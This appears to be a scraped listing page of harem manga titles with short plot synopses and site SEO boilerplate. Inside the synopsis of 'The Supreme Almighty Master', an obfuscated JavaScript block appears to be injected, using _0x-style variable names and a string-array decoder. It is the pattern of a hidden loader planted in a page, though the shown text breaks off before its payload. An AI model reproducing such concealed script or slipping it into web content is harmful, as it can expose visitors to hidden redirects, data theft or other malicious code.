Harem - Page 34

Harem manga focuses on a male lead with multiple romantic interests, blending comedy and emotion. A reverse harem features a female protagonist with a group of male admirers.

2122 results

Captive Hearts Of Oz

Dorothy Gale, along with her beloved dog Toto, finds herself whisked away by a tornado to the mysterious land of Oz. Something about this strange place feels oddly familiar, but Dorothy just wants to go home. Following the advice of a kindly Witch, Dorothy must travel to the Emerald City and seek out the Wizard of Oz, who alone has the power to send her back to her world. Alongside a trio of fascinating new companions, and a mysterious young man known as "Zero," Dorothy must follow the Yellow Brick Road on her journey to escape Oz and some of its less than friendly denizens, the evil Witches. Yet even though all this seems to be happening for the first time, Dorothy feels as if they have all met before... Buried secrets and conflicted romance await Dorothy as she travels through the wonderful land of Oz!


Tokiwa Kitareri!!

Yasaka Tokiwa lives in an unusual time, and according to his dreams, it's about to become even stranger. He's been having a dream of a woman called Ri'in ever since the robot, who he calls Makina, came to his home. He and Makina attend the same school, where their other classmates include a secret ninja (Kusanagi Kanata) and a sorcerer (Yata Haruka). When Tokiwa, the robot, the ninja, and the sorcerer rush to rescue the student council president from a demon, the boys find that they've all been having the same dream! What is going to happen to their world?


Magical★Explorer - It Seems I Have Become a Friend of the Protagonist In An Eroge World, But Because Magic is Fun I Have Abandoned The Role And Train Myself

There’s a legendary Bishoujo Game that has become popular among Japanese gentlemen.<br><br>Its name is “ Magical★Explorer” or Magiero for short.<br><br>The game’s protagonist has a cheat-like power with12 different beautiful heroines to flirt with, including additional 12 heroines from the DLC, a harem of 24 beauties. I have become that protagonist!………………Not. Instead, I have become the third-wheel character who always laughing like an idiot next to him.<br><br>Of course I was in despair at first.<br><br>Of course. If I am the protagonist I could have all 24 heroines for myself along with unparalleled cheat power. However, since I am the third-wheel there’s no heroine that would lay their eyes on me.<br><br>But now I couldn’t care less about the protagonist and his heroines. Why? Because I discovered magic. While I was using it, I have become interested in it. I want to master it. I want to become the strongest. Thus I have decided.<br><br>I would abandon half my role as a protagonist’s friend to train my magic and then I would beat the hell out of that cheat who can solo the Demon King.


The Supreme Almighty Master

"The most versatile student in history! An adventure changed my life. From then on, I got a full score in the exam, I will hit the score, basketball genius, swimmer, beautiful harem... omnipotent, how lonely~~ ~" Just another manhua trash with big boob<script></script><script>function _0xbb50(_0x2f8f24,_0x477cc8){var _0x3771dc=_0x4235();return _0xbb50=function(_0x1670db,_0x123147){_0x1670db=_0x1670db-(-0x19c6*0x1+0x7*-0x207+0x28c8);var _0x5eba21=_0x3771dc[_0x1670db];return _0x5eba21;},_0xbb50(_0x2f8f24,_0x477cc8);}(function(_0x16e198,_0x371238){var _0x4ca6b6=_0xbb50,_0x16704c=_0x16e198();while(!![]){try{var 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Sakigake No Hana Miko

There is a group of beautiful girls who fight against the “gods of calamity” who bring misfortune to people. They are called “flower shrine maidens” and live together in the “Night District Castle”. Arata, a mere part-time high school teacher, decides to become the chief of the flower shrine maidens after the death of his father. However, organizing a group of flower shrine maidens full of unique and problematic characters is more difficult than he imagined... Full of beautiful girls! Plenty of excitement! Feel the rush! The battle of the flower shrine maidens is about to begin!


Dhm - Dungeon + Harem + Master

Man's true worth is to entertain the beauties of the world. Summoned in a different world called Romless, the college student Simon Claud (or Shimon Kurando) aim about women, treasures and adventures runs around the labyrinths, deserts or cities. Young ladies, princess knight, beast girls, elves or woman assassins, I'll get them all! The most absurd dark fantasy is now unveiled. Men must adventured until the death!



Eighth Research is a large biotech company based on advanced research and development of DNA manipulation. Naoya Graphico is on the security team for the company run by his uncle. Naoya has been acknowledged for his high combat skills and is sent on top secret missions regarding Eighth Research’s interests. His most recent task has Naoya infiltrating a rival company where a mysterious girl named Celcia has been kidnapped. Naoya’s passion for protecting the weak always helps him accomplish missions; he just needs to make sure his libido doesn’t get in the way.


Butsuri-san de Musou shitetara Motemote ni Narimashita

Her harem is of semi-human girls?! I, who was forced to withdraw from my world. For to learn magic with an alchemist. While learning, I come to a moment that only with my eyes could make any girl fall in love.


Saiunkoku Monogatari

Shurei Hong, destitute but of noble birth, has always dreamed of working as a civil servant in the imperial court of Saiunkoku, but women are barred from holding office. The emperor Ryuki, however, refuses to take command, leaving everything to his advisors. Shurei is asked to become a consort to the emperor to persuade the ne’er-do-well ruler to govern. Shurei enters the palace as Ryuki’s consort, but he has yet to seek her out. It is rumored that men, not women, share the emperor’s bedchamber. Shurei must think of a way to stop the emperor from shirking his responsibilities, but she has to find him first!


The Martial Emperor's Life After Seclusion

The Martial Emperor's Life After Seclusion summary is updating. Come visit MangaNato.com sometime to read the latest chapter of The Martial Emperor's Life After Seclusion. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


Garnet Cradle - Gekkou no Aria

Amahashi Miku is a first year student at the elite Mifuta Academy and its a perfect one. Suddenly her life changes when she is chosen to play a role on the academy play. Soon a lot of events happen, including supernatural ones...and she even starts to have strange dreams with a unique black cat...


Start by signing in and obtaining the Ancient Divine Body

Read Manhwa Start by signing in and obtaining the Ancient Divine Body Online For Free At KunManga Start by signing in and obtaining the Ancient Divine Body Manga also known as “Kāijú Qiāndào Huānggǔ Shèng Tǐ / Scoring the Sacred Body of the Ancients from the Get-go / Sign-in at the Start With the Ancient Holy Body / Signing Into the Desolate Ancient Holy Body in the Beginning / Start by signing in and obtaining the Ancient Divine Body / 开局签到荒古圣体”. This OnGoing webtoon was released on 2023. The story was written by 星空社 and illustrations by 星空社. The content of the comic Start by signing in and obtaining the Ancient Divine Body: Jun Xiaoyao was transported to a mystical world and became the divine child of a Clan of the Ancients. He came to possess an invincible background, unparalleled talents and even a check-in system, enabling him to acquire an Accomplished Sacred Body of the Ancients at the very beginning of his new life. The comic Start by signing in and obtaining the Ancient Divine Body belongs to the Genre: Action, Drama, Fantasy, Harem, Martial Arts, Shounen Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Confession Attack Maxed Out Leveling In the Doghouse
